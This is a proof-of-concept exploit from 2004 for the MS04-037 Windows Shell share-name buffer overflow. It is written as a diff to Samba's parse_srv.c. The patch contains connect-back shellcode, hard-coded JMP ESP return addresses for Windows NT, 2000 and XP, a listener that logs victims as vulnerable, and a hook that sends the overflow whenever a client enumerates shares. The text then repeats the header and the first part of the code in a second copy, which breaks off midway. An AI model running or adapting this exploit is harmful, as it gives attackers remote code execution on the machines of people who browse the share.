MS04-037: Vulnerability in Windows Shell Could Allow Remote Code Execution - proof of concept

## parse_srv.c.diff
--- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O	Fri May 21 21:18:14 2004
+++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c	Sat Jun 12 18:26:37 2004
@@ -28,6 +28,450 @@
 #undef DBGC_CLASS
 #define DBGC_CLASS DBGC_RPC_PARSE

+/*
+ * Exploit code for "Microsoft's Explorer and Internet Explorer long
+ * share name buffer overflow" discovered by Rodrigo Gutierrez.
+ * $rev 1.5, Yorick Koster, June 12, 2004
+ *
+ * Tested on:
+ *  - Windows NT SP6 English build 1381 (Explorer)
+ *  - Internet Explorer 6.0 SP1 6.0.2800.1106 (WinNT SP6 English)
+ *  - Windows 2000 SP4 Dutch build 2195 (Explorer)
+ *  - Internet Explorer 6.0 SP1 6.0.2800.1106 (Win2k SP4 Dutch)
+ *  - Windows 2000 SP4 English build 2195 (Explorer)
+ *  - Internet Explorer 6.0 SP1 6.0.2800.1106 (Win2k SP4 English)
+ *  - Windows XP SP1 English build 2600 (Explorer)
+ *  - Internet Explorer 6.0.2800.1106.xpsp2 (WinXP SP1 English)
+ *
+ * Reference:
+ *  http://archives.neohapsis.com/archives/fulldisclosure/2004-04/0913.html
+ *
+ * Vulnerability details:
+ *  The buffer overflow occurs upon processing a NetrShareEnum response,
+ *  specifcally when processing SHARE_INFO_1 structures. This vulnerability
+ *  exists due to an unsafe StrCpyW() call within SHLWAPI.dll. The following
+ *  dump was made using OllyDbg (attached to explorer.exe), it contains the
+ *  vulnerable function that calls StrCpyW() (line 70AA342A):
+ *
+ *  70AA33E0  /$ 55             PUSH EBP
+ *  70AA33E1  |. 8BEC           MOV EBP,ESP
+ *  70AA33E3  |. 81EC 08020000  SUB ESP,208
+ *  70AA33E9  |. 53             PUSH EBX
+ *  70AA33EA  |. 56             PUSH ESI
+ *  70AA33EB  |. 8B75 10        MOV ESI,DWORD PTR SS:[EBP+10]
+ *  70AA33EE  |. F7DE           NEG ESI
+ *  70AA33F0  |. 1BF6           SBB ESI,ESI
+ *  70AA33F2  |. B8 00010000    MOV EAX,100
+ *  70AA33F7  |. 23F0           AND ESI,EAX
+ *  70AA33F9  |. 03F0           ADD ESI,EAX
+ *  70AA33FB  |. 833D 00B6AC70 >CMP DWORD PTR DS:[70ACB600],0
+ *  70AA3402  |. 57             PUSH EDI
+ *  70AA3403  |. 75 06          JNZ SHORT SHLWAPI.70AA340B
+ *  70AA3405  |. 81CE 00000001  OR ESI,1000000
+ *  70AA340B  |> 8B7D 0C        MOV EDI,DWORD PTR SS:[EBP+C]
+ *  70AA340E  |. 85FF           TEST EDI,EDI
+ *  70AA3410  |. 8B5D 08        MOV EBX,DWORD PTR SS:[EBP+8]
+ *  70AA3413  |. 75 09          JNZ SHORT SHLWAPI.70AA341E
+ *  70AA3415  |. 53             PUSH EBX
+ *  70AA3416  |. FF15 3C14A770  CALL DWORD PTR DS:[<&KERNEL32.lstrlenW>]
+ *  70AA341C  |. 8BF8           MOV EDI,EAX
+ *  70AA341E  |> 85DB           TEST EBX,EBX
+ *  70AA3420  |. 74 25          JE SHORT SHLWAPI.70AA3447
+ *  70AA3422  |. 53             PUSH EBX
+ *  70AA3423  |. 8D85 F8FDFFFF  LEA EAX,DWORD PTR SS:[EBP-208]
+ *  70AA3429  |. 50             PUSH EAX
+ *  70AA342A  |. E8 360BFFFF    CALL SHLWAPI.StrCpyW
+ *  70AA342F  |. 57             PUSH EDI
+ *  70AA3430  |. 53             PUSH EBX
+ *  70AA3431  |. 57             PUSH EDI
+ *  70AA3432  |. 8D85 F8FDFFFF  LEA EAX,DWORD PTR SS:[EBP-208]
+ *  70AA3438  |. 50             PUSH EAX
+ *  70AA3439  |. 56             PUSH ESI
+ *  70AA343A  |. 68 00080000    PUSH 800
+ *  70AA343F  |. FF15 4C13A770  CALL DWORD PTR DS:[<&KERNEL32.LCMapStringW>]
+ *  70AA3445  |. EB 02          JMP SHORT SHLWAPI.70AA3449
+ *  70AA3447  |> 33C0           XOR EAX,EAX
+ *  70AA3449  |> 5F             POP EDI
+ *  70AA344A  |. 5E             POP ESI
+ *  70AA344B  |. 5B             POP EBX
+ *  70AA344C  |. C9             LEAVE
+ *  70AA344D  \. C2 0C00        RETN 0C
+ *
+ *  Using the strCpyW() call, we control both EBP and EIP, which are
+ *  stored on the stack. Our stack looks something like this:
+ *
+ *   vvvvvvvvvvvvvvvvvvvvvvv  high adressess
+ *  |                       |
+ *  +-----------------------+
+ *  |                       | <- ESP points here
+ *  |                       |
+ *  |                       |
+ *  |                       |
+ *  +-----------------------+
+ *  |          EIP          |
+ *  +-----------------------+
+ *  |          EBP          |
+ *  +-----------------------+
+ *  |                       |
+ *  |                       |
+ *  |       our buffer      |
+ *  /                       /
+ *  |  243 - 251 widechars  |
+ *  |                       |
+ *  |                       |
+ *  +-----------------------+
+ *  |                       |
+ *  |     IP + backslash    |
+ *  |    8 - 16 widechars   |
+ *  |                       |
+ *  +-----------------------+
+ *  |                       |
+ *  ^^^^^^^^^^^^^^^^^^^^^^^^^ low addresses
+ *  (the stack grows down)
+ *
+ *  Note, it appears that the buffer overflow is only triggered when
+ *  using IP addresses (e.g. \\127.0.0.1). When using the NetBIOS name
+ *  (Internet) Explorer will display the share name. If someone
+ *  accidently views the share, for example when browsing the Network
+ *  Neighbourhood, it will not execute our shellcode.
+ *
+ * Exploit details:
+ *  As is shown in the above illustration, we control EIP after we
+ *  have written 245 - 253 widechars on the stack. Normally we would
+ *  determine the address of ESP and overwrite EIP with something like
+ *  ESP - 500. This will cause the program to execute the code that is in
+ *  our buffer. Unfortunately, the address of ESP differs every time we
+ *  point Explorer to our malicious share.
+ *
+ *  Since we don't know the address of ESP, we can't just overwrite EIP
+ *  and jump back to our shellcode. We need to find another way to get
+ *  back to our shellcode. Notice that ESP points above our shellcode,
+ *  so we have at least one address that is near our shellcode. We may
+ *  be able to use this pointer to get back to our shellcode. We can do
+ *  something like this:
+ *  	SUB ESP, 1f4h
+ *  	JMP ESP
+ *
+ *  We may be able to locate these instructions somewhere in one of the
+ *  DLLs that are loaded by Explorer. Or we can overwrite our buffer a
+ *  bit more and inject a second (small) shellcode on the stack, located
+ *  ESP. The purpose of this seconde shellcode is to jump back to the
+ *  actual shellcode located below ESP. At this moment we only have to
+ *  find a JMP ESP instruction in one of the DLLs loaded by Explorer.
+ *  The last method is prefered, since it is more likely that we will
+ *  find a JMP ESP located at the same address on various versions of
+ *  Windows.
+ *
+ *  The same technique also applies to Internet Explorer, however some
+ *  DLLs used by Internet Explorer are mapped into a different
+ *  address space. Therefore, a JMP ESP in Explorer may not exist (on
+ *  the same location) in Internet Explorer.
+ *
+ *  There are other methods that can be used to exploit this
+ *  vulnerability, however, we'll stick with the method described
+ *  above.
+ *
+ * Shellcode:
+ *  The shellcode contains several different techniques, the reason
+ *  for this is that I wanted to test various methods that are used
+ *  when writing shellcode. Because of this, the shellcode is a bit
+ *  large (around 500 bytes). However, this is not an issue at the
+ *  moment. The shellcode neatly fits into our buffer. The shellcode
+ *  has to be obtimized in order for it to work with other buffer
+ *  overflows.
+ *
+ *  Note that the shellcode contains NULL-bytes, this is also not
+ *  an issue, because we send an Unicode string to our target host.
+ *  In Unicode, an end-of-line character is encoded using two
+ *  NULL-bytes (a short). So, NULL-shorts are not allowed in the
+ *  shellcode.
+ *
+ *  The shellcode performs the following actions:
+ *  	- Locate the base address of kernel32.dll
+ *  	- Find function addresses for the functions:
+ *  		- ExitProcess (not needed, we can also trigger
+ *  		  an exception)
+ *  		- LoadLibraryA
+ *  		- GetProcAddress
+ *  	- Call LoadLibraryA("ws2_32.dll")
+ *  	- Call GetProcAddress(<handle>, "WSAStartup")
+ *  	- Call WSAStartup
+ *  	- Call GetProcAddress(<handle>, "WSASocket")
+ *  	- Call GetProcAddress(<handle>, "connect")
+ *  	- Call WSASocket
+ *  	- Call connect
+ *  	- Call ExitProccess
+ *
+ * Notes:
+ *  This exploit code has been tested using the following
+ *  smb.conf:
+ *
+ *  [global]
+ *  workgroup = DONTUSESTRCPY
+ *  security = share
+ *
+ *  [tmp]
+ *  path = /tmp
+ *  guest ok = yes
+ *  read only = yes
+ *
+ *  !!! Using this configuration makes /tmp world-readable. !!!
+ *
+ *  Be sure to check the contents of /tmp/vulnerable.log and
+ *  /usr/local/samba/var/log.smbd when running Samba.
+ *
+ * Disclaimer:
+ *  This exploit code is provided as-is, without any warranty.
+ *  Your are not allowed to (re)distribute or alter this
+ *  exploit code without my permission.
+ *
+ *  This code contains at least one (insecure file creation)
+ *  vulnerability. It does not claim to be secure in any way,
+ *  use it at your own risk.
+ *
+ * -- you shouldn't use strcpy, mmmmkay
+ */
+
+#define NOP	0x90
+
+// return addresses
+#define JMP_ESP_COMCTL32_EXP_WIN2K_SP4_B2195_NL 		0x717564b8
+#define JMP_ESP_COMCTL32_IE6_0_2800_1106_WIN2K_SP4_NL		0x007e64b8
+// almost universal ??
+#define JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL			0x70a7bf97
+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WIN2K_SP4_NL		JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
+#define JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_UK			JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WIN2K_SP4_UK		JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
+#define JMP_ESP_SHLWAPI_EXP_WINXP_SP1_B2600_UK			JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_xpsp2_WINXP_SP1_UK	JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
+// does not work on all versions of Windows NT,
+// maybe related to different IE versions?
+#define JMP_ESP_SHLWAPI_EXP_WINNT_SP6_B1381_UK			JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WINNT_SP6_UK		JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
+
+// the actual return address
+#define RET	JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
+
+unsigned char shell[] = "\x54\x89\xe5\x81\xc4\x00\xf0\xff\xff\x81\xe4\x00\xff\xff\xff\x8d"
+			"\x45\xe8\x89\x45\xd4\x8d\x45\xe4\x89\x45\xd8\x8d\x45\xe0\x89\x45"
+			"\xdc\xc7\x45\xc8\x6a\xbc\x06\x00\xc7\x45\xcc\x86\x57\x0d\x00\xc7"
+			"\x45\xd0\xfa\x8b\x34\x00\xc6\x45\xbc\x57\xc6\x45\xbd\x53\xc6\x45"
+			"\xbe\x41\xc6\x45\xbf\x53\xc6\x45\xc0\x74\xc6\x45\xc1\x61\xc6\x45"
+			"\xc2\x72\xc6\x45\xc3\x74\xc6\x45\xc4\x75\xc6\x45\xc5\x70\xc6\x45"
+			"\xc6\x00\xc6\x45\xb0\x77\xc6\x45\xb1\x73\xc6\x45\xb2\x32\xc6\x45"
+			"\xb3\x5f\xc6\x45\xb4\x33\xc6\x45\xb5\x32\xc6\x45\xb6\x2e\xc6\x45"
+			"\xb7\x64\xc6\x45\xb8\x6c\xc6\x45\xb9\x6c\xc6\x45\xba\x00\xc6\x45"
+			"\xa4\x57\xc6\x45\xa5\x53\xc6\x45\xa6\x41\xc6\x45\xa7\x53\xc6\x45"
+			"\xa8\x6f\xc6\x45\xa9\x63\xc6\x45\xaa\x6b\xc6\x45\xab\x65\xc6\x45"
+			"\xac\x74\xc6\x45\xad\x41\xc6\x45\xae\x00\xc6\x45\x9c\x63\xc6\x45"
+			"\x9d\x6f\xc6\x45\x9e\x6e\xc6\x45\x9f\x6e\xc6\x45\xa0\x65\xc6\x45"
+			"\xa1\x63\xc6\x45\xa2\x74\xc6\x45\xa3\x00\x33\xc0\x64\x8b\x40\x30"
+			"\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x89\x45\xfc\x8b\x58\x3c"
+			"\x03\xd8\x8b\x5b\x78\x03\xd8\x8b\x4b\x18\x89\x4d\xf8\x8b\x4b\x20"
+			"\x03\xc8\x89\x4d\xf4\x8b\x4b\x24\x03\xc8\x89\x4d\xf0\x8b\x4b\x1c"
+			"\x03\xc8\x89\x4d\xec\x33\xdb\x83\xfb\x0c\x74\x64\x8b\x45\xf0\x8b"
+			"\x4d\xf8\x8b\x55\xf4\x49\xe3\x53\x51\x52\x33\xff\x8b\x12\x03\x55"
+			"\xfc\x33\xc9\x8a\x0a\x84\xc9\x74\x0c\x83\xc9\x60\x03\xf9\xd1\xe7"
+			"\x83\xc2\x01\xeb\xec\x8d\x95\xc8\xff\xff\xff\x03\xd3\x8b\x0a\x3b"
+			"\xf9\x5a\x59\x74\x08\x83\xc0\x02\x83\xc2\x04\xeb\xc8\x33\xc9\x66"
+			"\x8b\x08\x8b\x55\xec\xc1\xe1\x02\x03\xd1\x8b\x12\x03\x55\xfc\x8d"
+			"\x8d\xd4\xff\xff\xff\x03\xcb\x8b\x09\x89\x11\x83\xc3\x04\xeb\x97"
+			"\x8d\x9d\xb0\xff\xff\xff\x53\xff\x55\xe4\x8b\xf8\x8d\x9d\xbc\xff"
+			"\xff\xff\x53\x57\xff\x55\xe0\x54\x33\xdb\x66\xbb\x01\x01\x53\xff"
+			"\xd0\x8d\x9d\xa4\xff\xff\xff\x53\x57\xff\x55\xe0\x8b\xf0\x8d\x9d"
+			"\x9c\xff\xff\xff\x53\x57\xff\x55\xe0\x8b\xf8\x33\xc0\x50\x50\x50"
+			"\x50\x40\x50\x40\x50\xff\xd6\x8b\xf0\x66\xb8\xff\xaa\xc1\xe0\x10"
+			"\x66\xb8\x02\x01\x50\x68\x02\x00\x55\x44\x8b\xcc\x33\xc0\xb0\x10"
+			"\x50\x51\x56\xff\xd7\xff\x55\xe8";
+
+unsigned char jmp2sh[] = 	"\x81\xc4\x06\xfe\xff\xff"	// add esp, -1fah
+				"\xff\xe4";			// jmp esp
+
+unsigned char magic_str[] = "\x66\xb8\xff\xaa\xc1\xe0\x10\x66\xb8\x02\x01\x50\x68\x02\x00\x55\x44";
+
+void insert_shellcode(unsigned char *ptr, unsigned char *code, unsigned int len)
+{
+	unsigned int i;
+
+	for(i = 0; i < len; i++)
+	{
+		*(ptr++) = *(code++);
+	}
+}
+
+void insert_address(unsigned char *ptr, unsigned long addr)
+{
+	ptr[0] = (unsigned char)(addr & 0xFF);
+	ptr[1] = (unsigned char)((addr >> 8) & 0xFF);
+	ptr[2] = (unsigned char)((addr >> 16) & 0xFF);
+	ptr[3] = (unsigned char)(addr >> 24);
+}
+
+void spawn_listener(unsigned char *ptr, unsigned int len)
+{
+	int sockfd = socket(PF_INET, SOCK_STREAM, 0);
+	struct sockaddr_in sin;
+	unsigned short port = 1025;
+	char *p;
+
+	memset(&sin, 0, sizeof(sin));
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(port);
+	sin.sin_addr.s_addr = inet_addr(client_socket_addr());
+
+	while(bind(sockfd, (struct sockaddr *)&sin, sizeof(sin)))
+	{
+		sin.sin_port = htons(++port);
+		if(port == 65535)
+		{
+			DEBUGADD(0, ("Unable to find a suitable portnumber (%d)\n", port));
+			exit(1);
+		}
+		p = (char *)&sin.sin_port;
+		if(!p[1]);
+			continue;
+	}
+
+	if(listen(sockfd, 1024))
+	{
+		DEBUGADD(0, ("Call to listen failed\n"));
+		exit(1);
+	}
+
+	len -= (sizeof(magic_str) - 1);
+	while(memcmp(ptr, magic_str, sizeof(magic_str) - 1))
+	{
+		if(!(--len))
+		{
+			DEBUGADD(0, ("Couldn't locate 'magic string'\n"));
+			exit(1);
+		}
+		ptr++;
+	}
+
+	p = (char *)&sin.sin_addr.s_addr;
+	ptr[2] = p[2];
+	ptr[3] = p[3];
+	ptr[9] = p[0];
+	ptr[10] = p[1];
+	p = (char *)&sin.sin_port;
+	ptr[15] = p[0];
+	ptr[16] = p[1];
+
+	if(!fork())
+	{
+		fd_set fds;
+		struct timeval tv;
+
+		umask(077);
+		tv.tv_sec = 5;
+		tv.tv_usec = 0;
+		FD_ZERO(&fds);
+		FD_SET(sockfd, &fds);
+
+		DEBUGADD(0, ("New listening process started (%s:%d)\n", client_socket_addr(), port));
+		if(select(sockfd + 1, &fds, NULL, NULL, &tv) > 0)
+		{
+			if(FD_ISSET(sockfd, &fds))
+			{
+				FILE *log;
+				struct sockaddr_in cli_addr;
+				socklen_t len =  sizeof(cli_addr);
+				int clientfd;
+				time_t tm;
+
+				clientfd = accept(sockfd, (struct sockaddr *)&cli_addr, &len);
+
+				time(&tm);
+				p = ctime(&tm);
+				p[strlen(p) - 1] = 0;
+
+				log = fopen("/tmp/vulnerable.log", "a");
+				if(!strcmp(get_peer_name(clientfd, False), client_name()))
+				{
+					char *fmst = "%s (%s) appears to be vulnerable\n";
+
+					if(log)
+					{
+						fprintf(log, "%s - ", p);
+						fprintf(log, fmst, client_name(), client_addr());
+						fclose(log);
+					}
+					DEBUGADD(0, (fmst, client_name(), client_addr()));
+				}
+				else
+				{
+					DEBUGADD(0, ("NOTICE: a different host (%s) connected back!\n",
+							get_peer_name(clientfd, False)));
+				}
+				close(clientfd);
+			}
+		}
+
+		close(sockfd);
+		exit(0);
+	}
+
+	close(sockfd);
+}
+
+void dump_buffer(unsigned char *ptr, unsigned int len)
+{
+	unsigned int i;
+
+	for(i = 0; i < len; i++)
+	{
+		if(!(i % 32))
+		{
+			DEBUGADD(0, ("\n"));
+		}
+		DEBUGADD(0, ("%.2x ", *(ptr++)));
+	}
+	DEBUGADD(0, ("\n"));
+}
+
+void do_sploit(UNISTR2 *unistr)
+{
+	int i = 0;
+
+	DEBUG(0, ("Trying to exploit %s\n", client_name()));
+
+	unistr->uni_max_len = 300;
+	unistr->uni_str_len = unistr->uni_max_len;
+	unistr->offset      = 0;
+	DEBUGADD(0, ("Reallocating memory\n"));
+	unistr->buffer      = talloc_realloc(get_talloc_ctx(), unistr->buffer,
+				unistr->uni_max_len * sizeof(uint16));
+	memset(unistr->buffer, NOP, unistr->uni_max_len * sizeof(uint16));
+	i += (16 - strlen(client_socket_addr())) + 1;
+
+	DEBUGADD(0, ("Inserting shellcode\n"));
+	insert_shellcode((unsigned char *)&unistr->buffer[i], shell, sizeof(shell) - 1);
+	i += 242;
+
+//	DEBUGADD(0, ("Setting EBP\n"));
+//	insert_address((unsigned char *)&unistr->buffer[i], 0x44434241);
+	i += 2;
+
+	DEBUGADD(0, ("Setting EIP\n"));
+	insert_address((unsigned char *)&unistr->buffer[i], RET);
+	i += 8;
+
+	DEBUGADD(0, ("Inserting shellcode\n"));
+	insert_shellcode((unsigned char *)&unistr->buffer[i], jmp2sh, sizeof(jmp2sh) - 1);
+
+	DEBUGADD(0, ("Spawning a new process, binding to a port & setting IP + port number\n"));
+	spawn_listener((unsigned char *)unistr->buffer, unistr->uni_max_len * sizeof(uint16));
+
+	unistr->buffer[unistr->uni_max_len - 1] = 0;
+
+	fflush(NULL);
+	DEBUGADD(0, ("Buffer contents: "));
+	dump_buffer((unsigned char *)unistr->buffer, unistr->uni_max_len * sizeof(uint16));
+
+	return;
+}
+
 /*******************************************************************
  Inits a SH_INFO_0_STR structure
 ********************************************************************/
@@ -119,6 +563,10 @@
 	if(!prs_align(ps))
 		return False;

+	if(!sh1->ptrs->type)
+	{
+		do_sploit(&sh1->uni_netname);
+	}
 	if(sh1->ptrs->ptr_netname)
 		if(!smb_io_unistr2("", &sh1->uni_netname, True, ps, depth))
 			return False;
	--- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O Fri May 21 21:18:14 2004
	+++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c Sat Jun 12 18:26:37 2004
	@@ -28,6 +28,450 @@
	#undef DBGC_CLASS
	#define DBGC_CLASS DBGC_RPC_PARSE

	+/*
	+ * Exploit code for "Microsoft's Explorer and Internet Explorer long
	+ * share name buffer overflow" discovered by Rodrigo Gutierrez.
	+ * $rev 1.5, Yorick Koster, June 12, 2004
	+ *
	+ * Tested on:
	+ * - Windows NT SP6 English build 1381 (Explorer)
	+ * - Internet Explorer 6.0 SP1 6.0.2800.1106 (WinNT SP6 English)
	+ * - Windows 2000 SP4 Dutch build 2195 (Explorer)
	+ * - Internet Explorer 6.0 SP1 6.0.2800.1106 (Win2k SP4 Dutch)
	+ * - Windows 2000 SP4 English build 2195 (Explorer)
	+ * - Internet Explorer 6.0 SP1 6.0.2800.1106 (Win2k SP4 English)
	+ * - Windows XP SP1 English build 2600 (Explorer)
	+ * - Internet Explorer 6.0.2800.1106.xpsp2 (WinXP SP1 English)
	+ *
	+ * Reference:
	+ * http://archives.neohapsis.com/archives/fulldisclosure/2004-04/0913.html
	+ *
	+ * Vulnerability details:
	+ * The buffer overflow occurs upon processing a NetrShareEnum response,
	+ * specifcally when processing SHARE_INFO_1 structures. This vulnerability
	+ * exists due to an unsafe StrCpyW() call within SHLWAPI.dll. The following
	+ * dump was made using OllyDbg (attached to explorer.exe), it contains the
	+ * vulnerable function that calls StrCpyW() (line 70AA342A):
	+ *
	+ * 70AA33E0 /$ 55 PUSH EBP
	+ * 70AA33E1 \|. 8BEC MOV EBP,ESP
	+ * 70AA33E3 \|. 81EC 08020000 SUB ESP,208
	+ * 70AA33E9 \|. 53 PUSH EBX
	+ * 70AA33EA \|. 56 PUSH ESI
	+ * 70AA33EB \|. 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10]
	+ * 70AA33EE \|. F7DE NEG ESI
	+ * 70AA33F0 \|. 1BF6 SBB ESI,ESI
	+ * 70AA33F2 \|. B8 00010000 MOV EAX,100
	+ * 70AA33F7 \|. 23F0 AND ESI,EAX
	+ * 70AA33F9 \|. 03F0 ADD ESI,EAX
	+ * 70AA33FB \|. 833D 00B6AC70 >CMP DWORD PTR DS:[70ACB600],0
	+ * 70AA3402 \|. 57 PUSH EDI
	+ * 70AA3403 \|. 75 06 JNZ SHORT SHLWAPI.70AA340B
	+ * 70AA3405 \|. 81CE 00000001 OR ESI,1000000
	+ * 70AA340B \|> 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C]
	+ * 70AA340E \|. 85FF TEST EDI,EDI
	+ * 70AA3410 \|. 8B5D 08 MOV EBX,DWORD PTR SS:[EBP+8]
	+ * 70AA3413 \|. 75 09 JNZ SHORT SHLWAPI.70AA341E
	+ * 70AA3415 \|. 53 PUSH EBX
	+ * 70AA3416 \|. FF15 3C14A770 CALL DWORD PTR DS:[<&KERNEL32.lstrlenW>]
	+ * 70AA341C \|. 8BF8 MOV EDI,EAX
	+ * 70AA341E \|> 85DB TEST EBX,EBX
	+ * 70AA3420 \|. 74 25 JE SHORT SHLWAPI.70AA3447
	+ * 70AA3422 \|. 53 PUSH EBX
	+ * 70AA3423 \|. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
	+ * 70AA3429 \|. 50 PUSH EAX
	+ * 70AA342A \|. E8 360BFFFF CALL SHLWAPI.StrCpyW
	+ * 70AA342F \|. 57 PUSH EDI
	+ * 70AA3430 \|. 53 PUSH EBX
	+ * 70AA3431 \|. 57 PUSH EDI
	+ * 70AA3432 \|. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
	+ * 70AA3438 \|. 50 PUSH EAX
	+ * 70AA3439 \|. 56 PUSH ESI
	+ * 70AA343A \|. 68 00080000 PUSH 800
	+ * 70AA343F \|. FF15 4C13A770 CALL DWORD PTR DS:[<&KERNEL32.LCMapStringW>]
	+ * 70AA3445 \|. EB 02 JMP SHORT SHLWAPI.70AA3449
	+ * 70AA3447 \|> 33C0 XOR EAX,EAX
	+ * 70AA3449 \|> 5F POP EDI
	+ * 70AA344A \|. 5E POP ESI
	+ * 70AA344B \|. 5B POP EBX
	+ * 70AA344C \|. C9 LEAVE
	+ * 70AA344D \. C2 0C00 RETN 0C
	+ *
	+ * Using the strCpyW() call, we control both EBP and EIP, which are
	+ * stored on the stack. Our stack looks something like this:
	+ *
	+ * vvvvvvvvvvvvvvvvvvvvvvv high adressess
	+ * \| \|
	+ * +-----------------------+
	+ * \| \| <- ESP points here
	+ * \| \|
	+ * \| \|
	+ * \| \|
	+ * +-----------------------+
	+ * \| EIP \|
	+ * +-----------------------+
	+ * \| EBP \|
	+ * +-----------------------+
	+ * \| \|
	+ * \| \|
	+ * \| our buffer \|
	+ * / /
	+ * \| 243 - 251 widechars \|
	+ * \| \|
	+ * \| \|
	+ * +-----------------------+
	+ * \| \|
	+ * \| IP + backslash \|
	+ * \| 8 - 16 widechars \|
	+ * \| \|
	+ * +-----------------------+
	+ * \| \|
	+ * ^^^^^^^^^^^^^^^^^^^^^^^^^ low addresses
	+ * (the stack grows down)
	+ *
	+ * Note, it appears that the buffer overflow is only triggered when
	+ * using IP addresses (e.g. \\127.0.0.1). When using the NetBIOS name
	+ * (Internet) Explorer will display the share name. If someone
	+ * accidently views the share, for example when browsing the Network
	+ * Neighbourhood, it will not execute our shellcode.
	+ *
	+ * Exploit details:
	+ * As is shown in the above illustration, we control EIP after we
	+ * have written 245 - 253 widechars on the stack. Normally we would
	+ * determine the address of ESP and overwrite EIP with something like
	+ * ESP - 500. This will cause the program to execute the code that is in
	+ * our buffer. Unfortunately, the address of ESP differs every time we
	+ * point Explorer to our malicious share.
	+ *
	+ * Since we don't know the address of ESP, we can't just overwrite EIP
	+ * and jump back to our shellcode. We need to find another way to get
	+ * back to our shellcode. Notice that ESP points above our shellcode,
	+ * so we have at least one address that is near our shellcode. We may
	+ * be able to use this pointer to get back to our shellcode. We can do
	+ * something like this:
	+ * SUB ESP, 1f4h
	+ * JMP ESP
	+ *
	+ * We may be able to locate these instructions somewhere in one of the
	+ * DLLs that are loaded by Explorer. Or we can overwrite our buffer a
	+ * bit more and inject a second (small) shellcode on the stack, located
	+ * ESP. The purpose of this seconde shellcode is to jump back to the
	+ * actual shellcode located below ESP. At this moment we only have to
	+ * find a JMP ESP instruction in one of the DLLs loaded by Explorer.
	+ * The last method is prefered, since it is more likely that we will
	+ * find a JMP ESP located at the same address on various versions of
	+ * Windows.
	+ *
	+ * The same technique also applies to Internet Explorer, however some
	+ * DLLs used by Internet Explorer are mapped into a different
	+ * address space. Therefore, a JMP ESP in Explorer may not exist (on
	+ * the same location) in Internet Explorer.
	+ *
	+ * There are other methods that can be used to exploit this
	+ * vulnerability, however, we'll stick with the method described
	+ * above.
	+ *
	+ * Shellcode:
	+ * The shellcode contains several different techniques, the reason
	+ * for this is that I wanted to test various methods that are used
	+ * when writing shellcode. Because of this, the shellcode is a bit
	+ * large (around 500 bytes). However, this is not an issue at the
	+ * moment. The shellcode neatly fits into our buffer. The shellcode
	+ * has to be obtimized in order for it to work with other buffer
	+ * overflows.
	+ *
	+ * Note that the shellcode contains NULL-bytes, this is also not
	+ * an issue, because we send an Unicode string to our target host.
	+ * In Unicode, an end-of-line character is encoded using two
	+ * NULL-bytes (a short). So, NULL-shorts are not allowed in the
	+ * shellcode.
	+ *
	+ * The shellcode performs the following actions:
	+ * - Locate the base address of kernel32.dll
	+ * - Find function addresses for the functions:
	+ * - ExitProcess (not needed, we can also trigger
	+ * an exception)
	+ * - LoadLibraryA
	+ * - GetProcAddress
	+ * - Call LoadLibraryA("ws2_32.dll")
	+ * - Call GetProcAddress(<handle>, "WSAStartup")
	+ * - Call WSAStartup
	+ * - Call GetProcAddress(<handle>, "WSASocket")
	+ * - Call GetProcAddress(<handle>, "connect")
	+ * - Call WSASocket
	+ * - Call connect
	+ * - Call ExitProccess
	+ *
	+ * Notes:
	+ * This exploit code has been tested using the following
	+ * smb.conf:
	+ *
	+ * [global]
	+ * workgroup = DONTUSESTRCPY
	+ * security = share
	+ *
	+ * [tmp]
	+ * path = /tmp
	+ * guest ok = yes
	+ * read only = yes
	+ *
	+ * !!! Using this configuration makes /tmp world-readable. !!!
	+ *
	+ * Be sure to check the contents of /tmp/vulnerable.log and
	+ * /usr/local/samba/var/log.smbd when running Samba.
	+ *
	+ * Disclaimer:
	+ * This exploit code is provided as-is, without any warranty.
	+ * Your are not allowed to (re)distribute or alter this
	+ * exploit code without my permission.
	+ *
	+ * This code contains at least one (insecure file creation)
	+ * vulnerability. It does not claim to be secure in any way,
	+ * use it at your own risk.
	+ *
	+ * -- you shouldn't use strcpy, mmmmkay
	+ */
	+
	+#define NOP 0x90
	+
	+// return addresses
	+#define JMP_ESP_COMCTL32_EXP_WIN2K_SP4_B2195_NL 0x717564b8
	+#define JMP_ESP_COMCTL32_IE6_0_2800_1106_WIN2K_SP4_NL 0x007e64b8
	+// almost universal ??
	+#define JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL 0x70a7bf97
	+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WIN2K_SP4_NL JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
	+#define JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
	+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WIN2K_SP4_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
	+#define JMP_ESP_SHLWAPI_EXP_WINXP_SP1_B2600_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
	+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_xpsp2_WINXP_SP1_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
